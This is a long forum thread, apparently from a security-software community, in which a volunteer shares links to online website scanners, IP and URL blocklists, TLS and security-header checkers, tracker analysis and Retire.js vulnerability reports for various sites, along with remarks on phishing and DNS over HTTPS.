       just skim over the contents.
       


Title: Re: Tests and other Media topics
Post by: polonus on March 10, 2019, 01:10:21 AM
Another report for this site flagged at urlquery dot net:
https://urlquery.net/report/4ea473d5-765f-4c09-9ac8-a805504606a8

Quote
File not found: -https://apis.google.com/js/plusone.js

ReferenceError: gapi is not defined
 -http://dahluhre.blogspot.com/:369

SyntaxError: Unexpected token <
 /:65

SyntaxError: Unexpected strict mode reserved word
 /:65

SyntaxError: Invalid or unexpected token
 /:65

SyntaxError: Unexpected identifier
 /:65

SyntaxError: Unexpected token <
 /:65

SyntaxError: Unexpected token &
 /:65

ReferenceError: urchinTracker is not defined
 -http://dahluhre.blogspot.com/:2390

SyntaxError: Unexpected token &
 -http://dahluhre.blogspot.com/:64

SyntaxError: Invalid or unexpected token
 -http://dahluhre.blogspot.com/:64

SyntaxError: Unexpected identifier
 -http://dahluhre.blogspot.com/:64

SyntaxError: Unexpected token <
 -http://dahluhre.blogspot.com/:64

SyntaxError: Unexpected strict mode reserved word
 -http://dahluhre.blogspot.com/:64

SyntaxError: Unexpected token <
 -http://dahluhre.blogspot.com/:64
Quote
Consider also here: https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=I3xobHVofXsubl0%3D~enc
iFrame flagged: iframes
Any iframes? Yes there are. show.

<iframe src="-http://www.dahluhre.blogspot.com" frameborder="0" width="100%" height="100%"></iframe>

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 29, 2019, 02:31:57 PM
PHISHING a gigantic online problem. Now meet a Plan for Scams.
https://www.gerv.net/security/a-plan-for-scams/ 
(propositions by various members of Mozilla Team).

Are their any new ideas, coming from the intensified efforrts of EUROPOL and the Industry fighting PHISHING.

I think, while visiting a phisingwebsite a "whois" is being performed for that websites' domainname,
and one checks whether the created and/or changed date are less than a weak old,
one would have caught out 95% of phising websites.

Within a few days you'd see these domains added to be blacklisted.
Are they being flagged in all browsers then immedeately?

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 01, 2019, 11:51:02 PM
The Reg has Admedo tracking. Where? -> https://www.theregister.co.uk/security/
What's that tracker?
Find out here: https://whotracks.me/trackers/admedo_com.html
Failed to load for me: -pj.l.admedo.com/admtracker.lib.min.js:1 F

Tracking on websites: https://whotracks.me/websites/avast.com.html

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 07, 2019, 11:23:05 PM
Checklists for intrusions from USA and around the globe:

Checked: https://urlhaus.abuse.ch/url/172785/
Re: https://www.megarbl.net/asncheck/AS6128  checklist per ASN,
also this one per IP: https://www.megarbl.net/blocking_list.php?ip=69.119.9.169
We missed such a resource for quite some time now.
to return in this form.
Also see: https://otx.alienvault.com/pulse/5ad51668240faa094ef77c68/history
And the daily: https://attackers.ongoing.today/closed.txt

More list to check against with this IP example: 92.53.65.2
Re: https://www.abuseipdb.com/check/92.53.65.2
also a university resource:  https://report.cs.rutgers.edu/mrtg/drop/dropstat.cgi?start=-3h
cybersecurity resource: https://www.binarydefense.com/banlist.txt?__hstc=103210719.1bb630f9cde2cb5f07430159d50a3c91.1538179200074.1538179200075.1538179200076.1&__hssc=103210719.1.1538179200077&__hsfp=2025384311  *

Enjoy, my good friends, enjoy,

* Use of the above list may be for strict private use only, and commercial use therefore is forbidden.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 11, 2019, 06:24:48 PM
AMP Page Validator: https://technicalseo.com/seo-tools/amp/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 20, 2019, 06:31:47 PM
Two resources coming up with similar abuse information for IP 46.17.42.130
https://urlhaus.abuse.ch/url/181145/
&
https://futex.re/tracker/index.php  (do not download red samples)

Linux Mirai example,  avast will detect this as ELF:Mirai-HU [Trj]:
https://www.virustotal.com/nl/file/4175d70a1c20164552c2d446f5bb56dcf4f02c1c4e4e5a99385b37076db725f7/analysis/1555674337/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 22, 2019, 07:42:53 PM
A fine tool to check on DNS, example: https://dnscheck.pingdom.com/#5a9186d122400000

Combine it with all of the toolbox here: https://mxtoolbox.com/

And here:  https://www.robtex.com/dns-lookup/

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 23, 2019, 11:08:49 AM
Two scanners to compare results for trackers:
1. CLIQZ and Ghostery driven: https://whotracks.me/websites/theregister.co.uk.html
&
2. beta scanner with privacy implications of visiting a website:
https://privacyscore.org/site/36977/

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 24, 2019, 12:58:04 PM
For Germany and the Netherlands new directives on the use of the latest TLS version 1.3 came out.

So it is time to check:
https://www.cdn77.com/tls-test and at http://ssl-checker.online-domain-tools.com/

Following should be phased out in due time and one better no longer support such weak TLS:
TLS 1.0, TLS 1.1 en 3DES en algorithm for static key-exchanges.

Also consider: https://geekflare.com/ssl-test-certificate/
example: https://www.immuniweb.com/ssl/?id=nU20eqHp

polonus

P.S. But windows exchange servers should also be upgraded,
else to take such measures are senseless in a certain perspective,
when it is not supported elesewhere on the infrastructure.

Title: Re: Tests and other Media topics
Post by: polonus on April 28, 2019, 06:55:57 PM
A certification tests for a domain produces two A+ results: https://www.sslcheck.nl/mett.nl
all checked for a Dutch gov. subcontractor certificate.

However there were weak ciphers and there was a CAA issue,
which could be solved here with this generator: https://sslmate.com/caa/

Re: https://cipherli.st/

produced:
Quote
Generic
For Google Cloud DNS, Route 53, DNSimple, and other hosted DNS services

Name   Type   Value
mett.nl.   CAA   0 issue ";"
Standard Zone File
For BIND ≥9.9.6, PowerDNS ≥4.0.0, NSD ≥4.0.1, Knot DNS ≥2.2.0

mett.nl.   IN   CAA   0 issue ";"
Legacy Zone File (RFC 3597 Syntax)
For BIND <9.9.6, NSD <4.0.1, Windows Server 2016

-mett.nl.   IN   TYPE257   \# 8 000569737375653B
tinydns
:-mett.nl:257:\000\005\151\163\163\165\145\073
dnsmasq
--dns-rr=-mett.nl,257,000569737375653B

enjoy, my good avast friends, enjoy,

polonus

Also consider info here: https://www.entrustdatacard.com/knowledgebase/how-to-add-a-certification-authority-authorization-caa-record-using-tinydns  and another tool: https://tools.ietf.org/html/rfc6844#section-5
Title: Re: Tests and other Media topics
Post by: polonus on May 01, 2019, 01:09:28 PM
JavaScript and SEO, all you wanted to know.

Pre-loading the DOM first is advisable.
On your website - be crawlable for both Googlebot and Caffeine alike.
Google and Caffeine are often mixed-up even by Google's staff members.

Make sure your content does not depend solely on JavaScript, but also on HTML.
In the future Googlebot may render newest JavaScript.
(now renders 2018 script through the 69 version of the browser,
later will come to use the latest version);
writing isomorphic Javascript being pre-rendered on the webserver may help SEO,
and load performance, but the apt developer must have the capacity to implement this.

Google plans to integrate crawling and rendering, as planned at their 2018 Chrome Dev Summit,
but JavaScript issues may remain, so there will still will be reports coming from analysts like little old me.

Info credits go to Marketingfacts JavaScript & SEO,
all you should know by Tom Wester SEO-strategist at RIFF's.


Test your performance on the client and webserver here,
-> https://gtmetrix.com/reports/

Enjoy, my good avast friends, enjoy,

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)

Title: Re: Tests and other Media topics
Post by: polonus on May 03, 2019, 04:23:42 PM
Linting JavaScript code with JSHint at https://jshint.com/

What script was checked:  https://www.security.nl/js/core.js?13757912339  DOM-XSS 39 sources and 16 sinks detected.
beautifying and code improvement results:
Quote
CONFIGURE
Metrics
There are 86 functions in this file.

Function with the largest signature take 4 arguments, while the median is 1.

Largest function has 38 statements in it, while the median is 4.

The most complex function has a cyclomatic complexity value of 7 while the median is 2.

Nine warnings
27   ['position'] is better written in dot notation.
175   Missing semicolon.
288   'result' is already defined.
295   'result' is already defined.
556   Missing semicolon.
750   Missing semicolon.
778   A leading decimal point can be confused with a dot: '.45'.
840   ['compatability'] is better written in dot notation.
1207   Missing semicolon.
Three undefined variables
29   $
31   $
33   $
35   $
37   $
39   $
41   $
43   $
45   $
47   $
49   $
51   $
53   $
55   $
57   $
59   $
61   $
63   $
65   $
67   $
69   $
71   $
73   $
75   $
77   $
79   $
83   $
85   $
87   $
93   $
95   $
97   $
101   $
111   $
116   $
141   $
143   $
145   $
149   $
153   $
159   $
188   $
203   $
216   $
220   $
222   $
224   $
233   $
240   $
247   $
254   $
263   $
272   $
274   $
282   $
304   $
306   $
308   $
318   $
329   $
331   $
333   $
335   $
345   $
363   $
374   $
376   $
378   $
388   $
399   $
401   $
403   $
405   $
407   $
409   $
419   $
435   $
443   $
456   $
458   $
464   $
472   $
476   $
494   $
496   $
509   $
513   $
515   $
523   $
529   $
537   $
539   $
541   $
565   $
567   $
569   $
571   $
585   $
594   $
614   $
622   $
633   $
637   $
645   $
651   $
676   $
695   $
701   $
703   $
705   $
711   $
715   $
715   $
719   $
723   $
725   $
734   $
738   $
742   $
759   $
761   $
763   $
767   $
776   $
778   $
780   $
788   $
790   $
792   $
799   $
806   $
810   $
812   $
812   $
818   $
820   $
831   $
833   $
840   $
848   $
850   $
852   $
862   $
864   $
880   $
888   $
904   $
908   $
938   $
940   $
962   $
964   $
986   $
988   $
1010   $
1012   $
1032   $
1036   $
1052   $
1056   $
1058   $
1079   $
1081   $
1085   $
1089   $
1091   $
1112   $
1114   $
1118   $
1120   $
1122   $
1142   $
1144   $
1166   $
1168   $
1170   $
1177   $
1179   $
1188   $
1190   $
1203   $
1229   $
1233   $
1237   $
1245   $
1245   $
1247   $
1256   $
1258   $
1267   $
1269   $
1276   $
1278   $
1285   $
1287   $
1289   $
254   mytoken
345   mytoken
421   mytoken
478   mytoken
531   mytoken
596   mytoken
655   mytoken
742   mytoken
838   mytoken
866   mytoken
1205   mytoken
1237   mytoken
697   width
703   width
Three unused variables
21   default_hover_options
23   default_video_options
133   preload

For JavaScript debuggers, enjoy, my friends, enjoy.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 08, 2019, 05:59:50 PM
Everybody wants an honest webshop experience, don't they?

Check here it can be trusted?
Re: https://www.trustpilot.com/

Some things to check and go over:
1. Is the product genuine or is it a cheap and lousy imitation?
2. How does the webshop look, sloppy, bad presentation of consumer goods,
    Does it have bad grammar and misspellings?
3. Is there a under construction message to mask bad construction?
4. How did others qualify that webshop? Has it a bad online rep?
5. Check the registration of the site online. Is it a scam or a known fraud?
6. Do you have a secure connection to it? Green lock - https & tls right version?
7. What category webshop gives a major chance this could mean scam or fraud?
8. When paying credit card, claim damage in time when goods do not arrive,
9. Report to authorities even when there is small chance the owners will get nailed.
(source credits go to Dutch AD.nl newspaper's article)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 21, 2019, 05:07:27 PM
Performance reports can also indicate possible security implications:
See: https://gtmetrix.com/reports/www.hotline40.com.au/Gux43WX9

Combine with: https://securityheaders.com/
an F-grade result here: https://securityheaders.com/?q=https%3A%2F%2Fwww.hotline40.com.au%2F&followRedirects=on

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 21, 2019, 06:00:50 PM
Various websites have issues with jQuery libraries, that should be retired because of vulnerabilities,
some issues can be abused e.g. bootstrap.js

An example: hint #1: 'Bootstrap@3.3.5' has 5 known vulnerabilities (5 medium). See 'https://snyk.io/vuln/npm:bootstrap' for more information: https://webhint.io/scanner/a3b2b998-0045-489b-934f-155784c7bfcd#hint-no-vulnerable-javascript-libraries-1

We can have that info via an extension
Quote
Retire.js
bootstrap   3.3.5   Found in http://dk-advertising.com/wp-content/plugins/content-views-query-and-display-post-page/public/assets/js/cv.js?ver=2.1.3.3
Vulnerability info:
High   28236 XSS in data-template, data-content and data-title properties of tooltip/popover CVE-2019-8331   1
Medium   20184 XSS in data-target property of scrollspy CVE-2018-14041   1
Medium   20184 XSS in collapse data-parent attribute CVE-2018-14040   1
Medium   20184 XSS in data-container property of tooltip CVE-2018-14042   1
jquery   1.7.0   Found in https://ajax.googleapis.com/ajax/libs/jquery/1.7.0/jquery.min.js?ver=5.2
Vulnerability info:
Medium   CVE-2012-6708 11290 Selector interpreted as HTML   123
Medium   2432 3rd party CORS request may execute CVE-2015-9251   1234
Medium   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution

or here online: https://retire.insecurity.today/#!/scan/531a6fa7af013314295e06229fcae3e27022551843a80ca3d0aeaaea484ed5cd

complicating vuln. :  Directory Indexing
In the test an attempt was made to list the directory contents of the uploads and plugins folders to determine if Directory Indexing is enabled. This is a common information leakage vulnerability that can reveal sensitive information regarding your site configuration or content.

/wp-content/uploads/      enabled  (insecure)
/wp-content/plugins/      disabled

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 22, 2019, 09:12:19 PM
Fine resources: http://www.scada-radar.com/protocol.php?protocol=BACnet/IP
This in the light of Delphi malcode dropper like malicious protocol.php (analysis of Zebrocy dropper)

But the website we visit here with that scanner needs some jQuery libraries to be retired:
Quote
Retire.js
bootstrap   3.3.4   Found in http://www.scada-radar.com/js/bootstrap.min.js
Vulnerability info:
High   28236 XSS in data-template, data-content and data-title properties of tooltip/popover CVE-2019-8331   
Medium   20184 XSS in data-target property of scrollspy CVE-2018-14041   
Medium   20184 XSS in collapse data-parent attribute CVE-2018-14040   
Medium   20184 XSS in data-container property of tooltip CVE-2018-14042   
jquery   1.11.3   Found in https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js
Vulnerability info:
Medium   2432 3rd party CORS request may execute CVE-2015-9251   1234
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers   
Medium   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   123
jquery   1.8.2   Found in http://www.scada-radar.com/js/jquery_1_8_2.min.js
Vulnerability info:
Medium   CVE-2012-6708 11290 Selector interpreted as HTML   
Medium   2432 3rd party CORS request may execute CVE-2015-9251   
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers   
Medium   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS,
and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution

only minor improvment site recommendations, 16 in all: https://webhint.io/scanner/a1cf7fd6-fd7d-4233-ba98-e17de6b6c7e1

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on June 17, 2019, 10:32:30 PM
Check sites asgainst: https://urlhaus.abuse.ch/url/209727/  detection
Version does not appear to be latest 5.2.1 - update now.  Rep. check warning -
checked at https://hackertarget.com/wordpress-security-scan/
checked IP for relations: https://www.virustotal.com/gui/ip-address/150.95.52.111/relations
checked at sucuri's: https://sitecheck.sucuri.net/results/https/blogmason.mixh.jp
checked for web app attacks, brute force attacks etc.: https://www.abuseipdb.com/check/150.95.52.111
checked against phishing lists: https://checkphish.ai/ip/150.95.52.111
submitted hdere: https://urlscan.io/result/fddcd2bb-841c-4c44-bbcc-a7f276c3cb73
check on IP: https://censys.io/ipv4/150.95.52.111

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 23, 2019, 12:07:11 AM
Malicious JA3 fingerprints to fingerprint SSL/TLS client applications. In the best case, you can use JA3 to identify malware traffic that is leveraging SSL/TLS.
However mind that these fingerprints have not been tested against known good traffic yet and may cause a significant amount of FPs!

Find them here: https://sslbl.abuse.ch/ja3-fingerprints/   compare with findings here: https://urlhaus.abuse.ch/browse/

pol
Title: Re: Tests and other Media topics
Post by: polonus on June 23, 2019, 10:35:41 PM
Your browser knows all about you, all and everything.
What is going on under the hood?


Read this extensive paper by Sally Vandeven:
https://www.sans.org/reading-room/whitepapers/authentication/ssl-tls-whats-hood-34297

also read: https://en.wikipedia.org/wiki/Public-key_cryptography

And again polonus says, check and test it: http://codefromthe70s.org/certcheck.aspx

polonus

Title: Re: Tests and other Media topics
Post by: polonus on June 27, 2019, 08:22:54 AM
Mozilla makes online tracking visable.

Give those surveillance capitalistic trackers something to chew on.

See: https://trackthis.link/

It does not bring back the happy days of freebee Interwebz, like we knew it once,
the happy days before vendor lock-in came to hold us all as hostages,
but on the fringes of the existing commercial internet,
innovation will help us all against allmighty Big Brother Data Grabbers.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 29, 2019, 01:26:23 PM
SSL and TLS checking:

Background read: https://isc.sans.edu/forums/diary/Psst+Your+Browser+Knows+All+Your+Secrets/16415/

Check: https://www.cdn77.com/tls-test

http://ssl-checker.online-domain-tools.com/

various tools e.g.: https://www.digicert.com/help/

Dane TLS check: https://www.huque.com/bin/danecheck

various tools here, e.g.: https://mxtoolbox.com/problem/smtp/smtp-tls

Discontinued service: https://cryptoreport.websecurity.symantec.com/

enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 05, 2019, 07:42:13 PM
Websites that frustrate the use of alternative browsers:
https://www.theregister.co.uk/2002/10/25/alternative_browser_villains_named/

Banks and Linux Browsers - a (in)compatibility oversight:
http://www.starnix.com/banks-n-browsers.html

Mozilla Browser Doh policy was attacked by regulators because it helps in circumventing UK provider filters,
Mozilla now is seen as a kind of a "villain"browser by UK providers.
The only reason is because providers now have to look for alternative ways to make their content filters function.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 11, 2019, 05:01:56 PM
Privacy issues and security issues are often related.

How to scan for them?

1. Rendering as a normal browser would - extensive report:
https://webcookies.org/cookies/dmstreeremoval.com.au/27913092?662402

2. 2 vulnerable and retirable jQuery libraries detected:
https://retire.insecurity.today/#!/scan/875a8bdadc0d2f7b324b9f54c858fd715e6306b13b290027a63c362f60401a12

3. Data Layer check: 2{data}  Show (2)
{
   "0": "config",
   "1": "UA-109165814-1"
}
&
{
   "0": "js",
   "1": "2019-07-11T14:12:41.413Z"
}

4. Trackers:    Track   From   To   Action   
   
-dmstreeremoval.com.au -dmstreeremoval.com.au

-dmstreeremoval.com.au -dmstreeremoval.com.au

-dmstreeremoval.com.au -dmstreeremoval.com.au

-fonts.googleapis.com -fonts.googleapis.com

- fonts.gstatic.com

5. Always considerate these scan results: https://www.virustotal.com/gui/url/9fafcfbfa5bdd5456d5c525427d8808cb17b9d8c09697cafd03c5a1bbcb80903

6. Overall warnings: https://privacyscore.org/site/141978/

cache control, x-frame-options, content-security-policy headers not set or not following best policies.
No form autocomplete settings set. source RECX Security Analyser extension results.

7. 1 out of 10 risk on https://toolbar.netcraft.com/site_report?url=https%3A%2F%2Fdmstreeremoval.com.au%2F

8. detections on IP relations: https://www.virustotal.com/gui/ip-address/162.243.29.224/relations

9. Mainly check for cloaking and weird redirects, not here: http://isithacked.com/check/https%3A%2F%2Fdmstreeremoval.com.au%2F

10. DOM-XSS results:
Quote
Results from scanning URL: -https://dmstreeremoval.com.au
Number of sources found: 4
Number of sinks found: 249

Results from scanning URL: -https://dmstreeremoval.com.au/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
Number of sources found: 32
Number of sinks found: 13

Results from scanning URL: -https://dmstreeremoval.com.au/wp-content/plugins/photoswipe-masonry/photoswipe-masonry.js?ver=4.9.8
Number of sources found: 14
Number of sinks found: 4

Results from scanning URL: -https://dmstreeremoval.com.au/wp-content/plugins/photoswipe-masonry/photoswipe-dist/photoswipe-ui-default.min.js?ver=4.9.8
Number of sources found: 12
Number of sinks found: 2

Results from scanning URL: -https://dmstreeremoval.com.au/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4
Number of sources found: 44
Number of sinks found: 33

Results from scanning URL: -https://dmstreeremoval.com.au/wp-content/plugins/kiwi-logo-carousel/third-party/jquery.bxslider/jquery.bxslider.js?ver=4.9.8
Number of sources found: 12
Number of sinks found: 12

11. Also a scan for PHP driven Word Press CMS at https://hackertarget.com/wordpress-security-scan/
Reputation Check
PASSED
Google Safe Browse: OK
Spamhaus Check: OK
Abuse CC: OK
Dshield Blocklist: OK
Cisco Talos Blacklist: OK
Web Server:
Apache/2.4.6
X-Powered-By:
PHP/7.1.8
IP Address:
-162.243.29.224
Hosting Provider:
DigitalOcean 
Shared Hosting:
276 sites found on -162.243.29.224

12. Outdated software on webserver and for Word Press and missing security headers qualified a a High Risk site at:
https://sitecheck.sucuri.net/results/https/dmstreeremoval.com.au

13. Total of 13 direct threats detected here: https://app.upguard.com/webscan#/https://dmstreeremoval.com.au
Security Checks for -https://dmstreeremoval.com.au
Quote
(2) Vulnerabilities can be uncovered more easily
(4) Susceptible to man-in-the-middle attacks
Vulnerabilities
(2) Emails can be fraudulently sent
(3) Unnecessary open ports
DNS is susceptible to man-in-the-middle attacks

14. https://urlscan.io/result/9cf81b77-d79f-4aa5-9d65-ce5be4f715c8

Verdict non-malicious non-suspicious site, outdated software and server software, so High Risk website,
various security issues and missing best policies being implemented. Looks good, less secury.
As security is often a last resort thing in website developing and also maintaining websites.

Enjoy checking your websites, folks,

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on July 22, 2019, 05:15:45 PM
Checking a particular IP. Where we found it: https://urlquery.net/report/63564530-782e-4486-8c90-6b86f60b1514
Re: https://www.abuseipdb.com/whois/217.160.0.127
Re: https://dnslytics.com/ip/217.160.0.127
Re: https://checkphish.ai/ip/217.160.0.127
Re: https://www.maltiverse.com/ip/217.160.0.127https://www.reverse.it/sample/6dd77fce803eea862d81de51f28e214d71c8f23296f389e6d17ba7c41fccc58f?environmentId=100
Detections on relations here: https://www.virustotal.com/gui/ip-address/217.160.0.127/relations

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 25, 2019, 12:24:44 AM
Rather specific and fully random source: https://libraryofbabel.info/
A treat for full encryption lovers. See for instance: https://libraryofbabel.info/anglishize.cgi?

Info credits go to Sabroni at https://forums.theregister.co.uk/forum/all/2019/07/23/us_encryption_backdoor/

When nobody has full encryption only cybercriminals will have. Think of it, folks.
Do you want to hand over your general key(s), please  :(

polonus


Title: Re: Tests and other Media topics
Post by: polonus on August 08, 2019, 09:56:22 AM
Resource Blocked Servers: https://www.blockedservers.com/
because of http://gladesoft.com:8080/logs & https://urlhaus.abuse.ch/url/223109/ etc.
10 red out of 10 Netcraft risk: https://toolbar.netcraft.com/site_report?url=http%3A%2F%2F218.61.16.142
7 detected URLs: https://www.virustotal.com/gui/ip-address/218.61.16.142/details
Blocked because associated with a trojan: Updated by 54.70.118.129 (Amazon Boardman) 1 week, 6 days ago
tcpwrapped http       Microsoft-IIS/6.0 (Chinese mainland mono-culture server).
On many block- and blacklists. Various online/offline threats: https://urlhaus.abuse.ch/host/218.61.16.142/

Another example: https://www.blockedservers.com/blocked/ipv4/51.77.95.123/  status clear
See: https://urlhaus.abuse.ch/url/223102/  conflicting results?

More resources, for Africa: https://threathaus.com/browse 

For Mirai: https://mirai.security.gives/index.php?search=109.97.51.62
&  http://sanyalnet-cloud-vps.freeddns.org/mirai-ips.txt
Poor Roque: https://raw.githubusercontent.com/ktsaou/blocklist-ipsets/master/ciarmy.ipset

Also consider: https://nl.ipshu.com/whois_ipv4/115.193.112.213 (random example)
also found here: https://malwareworld.com/textlists/suspiciousIPs.txt
and here: https://raw.githubusercontent.com/ktsaou/blocklist-ipsets/master/alienvault_reputation.ipset
and http://server3.pubres.cz/webalizer/webalizer.current
Compare: https://www.joesandbox.com/analysis/49409/0/html#domains
and https://www.abuseipdb.com/check/37.21.44.76
See: https://github.com/zabojcaspamu/spamassassin_rules/blob/master/local.cf.BL.ZABOJCASPAMU

Various resources: https://zeltser.com/malicious-ip-blocklists/


polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 08, 2019, 07:42:32 PM
Address still launching malware:
Quote
2019-08-08 17:27:05   -http://patogh-7f.rozblog.c ...   79.127.127.68   IR   JS/CoinMiner.AHpotentiallyunwantedapplication
Re: https://otx.alienvault.com/indicator/ip/79.127.127.68  &  https://www.threatminer.org/host.php?q=79.127.127.68

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 08, 2019, 08:41:05 PM
Check on scams: http://www.scamfoo.com/site/pumafenty.com/
and
https://www.scamadviser.com/check-website/pumafenty.com

Further IP checkers: https://www.abuseipdb.com/whois/104.28.16.62
https://checkphish.ai/ip/104.28.16.62
-https://support.clean-mx.com/clean-mx/viruses.php?netname=CLOUDFLARENET&sort=id%20asc&response=alive  (alerted by avast)
https://any.run/report/6e99730c1ce658125d7d181f9a6cc5aade8377ec1998d13af26515d99771ced8/1ff01ffc-7535-4100-af05-90d90ce933e8
https://www.malwareurl.com/listing.php?as=AS13335&active=off&view=all
https://www.hybrid-analysis.com/sample/14d82c8e39c2763c3b615f78b990e8ab058c55bf903ecda5f02cc1c98e19e991?environmentId=100

polonus







0
Title: Re: Tests and other Media topics
Post by: polonus on August 12, 2019, 12:00:03 AM
website checks and crypt check:
https://urlscan.io/result/49f31b2f-0b76-4977-973c-131aa0124576/
https://urlscan.io/domain/www.esri.com
https://securityheaders.com/?q=www.esri.com&followRedirects=on
https://observatory.mozilla.org/analyze/www.esri.com#third-party & https://observatory.mozilla.org/analyze/www.esri.com
https://tls.imirhil.fr/https/www.esri.com
https://webhint.io/scanner/d4503ab6-e6ba-4664-8cd8-c00794392d9f#category-Security
Retire.js
jquery   1.12.4   Found in -https://www.esri.com/etc/clientlibs/esri-sites/components.a85066077ee6f134710aeddea8215009.js
Vulnerability info:
Medium   2432 3rd party CORS request may execute CVE-2015-9251   
Medium   CVE-2015-9251 11974 parseHTML() executes scripts in event handlers   
Medium   CVE-2019-11358 jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution   

A parser-blocking, cross site (i.e. different eTLD+1) script, <URL>, is invoked via document.write. The network request for this script MAY be blocked by the browser in this or a future page load due to poor network connectivity. If blocked in this page load, it will be confirmed in a subsequent console message. See <URL> for more details. On Avast Secure Browser with Shift + Ctrl + I.
Why? Read here: https://developers.google.com/web/updates/2016/08/removing-document-write

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 13, 2019, 10:39:08 AM
More security header scans online:
https://www.immuniweb.com/websec/
https://tools.geekflare.com/secure-headers-test
https://hackertarget.com/http-header-check/
https://securityheaders.com/
https://httpsecurityreport.com/
Background read: https://csp.withgoogle.com/docs/index.html

enjoy, my friends, enjoy

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 15, 2019, 12:47:14 PM
Read: https://medium.com/@luanherrera/xs-searching-googles-bug-tracker-to-find-out-vulnerable-source-code-50d8135b7549
info credits go out to: Luan Herrera

Re: https://chromium.googlesource.com/infra/infra/+/master/appengine/monorail

Helpful here: https://unminify.com/  &  https://www.generateit.net/javascript-decompressor/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 27, 2019, 07:18:20 PM
Logging in with your facebook account, what privacy implications do you have to fear not blocking facebook?

The impact of a non-blocked visit:
https://privacyscore.org/site/143919/
& https://urlscan.io/result/5ea7f793-0c20-4fd9-8f1a-bb810babfab3

Or the consequenties for your digital privacy seen here:
https://urlscan.io/result/5ea7f793-0c20-4fd9-8f1a-bb810babfab3#links

Just interesting to skim through - JavaScript behaviour on that site:
https://urlscan.io/result/5ea7f793-0c20-4fd9-8f1a-bb810babfab3#behaviour
Did not know they used babel helper (generated per session).

Better than to speculate is to let the facts speak out for themselves. info credits: luntrus

polonus (volunteer 3rd part cold recon website security analyst and website error-helper)
Title: Re: Tests and other Media topics
Post by: bob3160 on August 27, 2019, 10:00:58 PM
The best way to avoid the privacy implications that are part of Facebook,
is to never open a Facebook account. Once opened, expect to kiss your privacy bye bye.
Title: Re: Tests and other Media topics
Post by: DavidR on August 27, 2019, 10:22:55 PM
The best way to avoid the privacy implications that are part of Facebook,
is to never open a Facebook account. Once opened, expect to kiss your privacy bye bye.

Guess why I have given social networking and the like a wide berth since they first appeared ;)
Title: Re: Tests and other Media topics
Post by: polonus on September 04, 2019, 04:13:25 PM
Super Logout online: http://kapat.org/

Intel search engine, made by Peter Kleissner, the sinkhole expert.

Polonus was trained in automatic sinkholing expertise online by Peter Kleissner, n
ow head of Intelligence X
Re: https://intelx.io/?did=d4a06454-081c-45be-9ed2-9329499c5e89
and see how we reached that super logout tool...

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 07, 2019, 08:30:22 PM
Coming to USA Firefox now:
DoH: https://blog.mozilla.org/futurereleases/2019/09/06/whats-next-in-making-dns-over-https-the-default/
Advantages and disadvantages.
See Client Support: https://en.wikipedia.org/wiki/DNS_over_HTTPS

This all to battle against abuse of unencrypted DNS request connections.

Why this is not such a good idea for end-users:
1) Concentrating all DoH requests with a small group of external players (like CloudFlare, Google) will mean an enhanced privacy risk for a large number of Internet-users, because mentioned players will exactly know for a great numer of Internet-users when and what websites they visit. Censorship and downgrading of certain websites is not unthinkable. From a privacy viewpoint it would be a goiod thing one could have many more DoH providers to choose from, but then blacklisting will be more of a problem, because;

2) Local DNS-logging does no longer take place at firm-level. Of-course such logging means an enhanced risk, but it will enable you to detect compromitted devices within your network;

3) DoH will raise demand for TLS-interception considerably and the risks therof outbalance overall profit.

(info credits: Erik van Straaten).

Using Pi-hole in such a setting makes you dependant on just one single DOH-provider. What about virtual hosts on one IP address.

But "DNS queries for the A and AAAA records for the domain “use-application-dns.net” must respond with NXDOMAIN rather than the IP address retrieved from the authoritative nameserver".

Mozilla just thinks to comply with the following contract: In the US, Firefox by default directs DoH queries to DNS servers that are operated by CloudFlare, meaning that CloudFlare has the ability to see users' queries. Mozilla has a strong Trusted Recursive Resolver (TRR) policy in place that forbids CloudFlare or any other DoH partner from collecting personal identifying information.
To mitigate this risk, our partners are contractually bound to adhere to this policy. (does not just only apply to Cloudflare's)
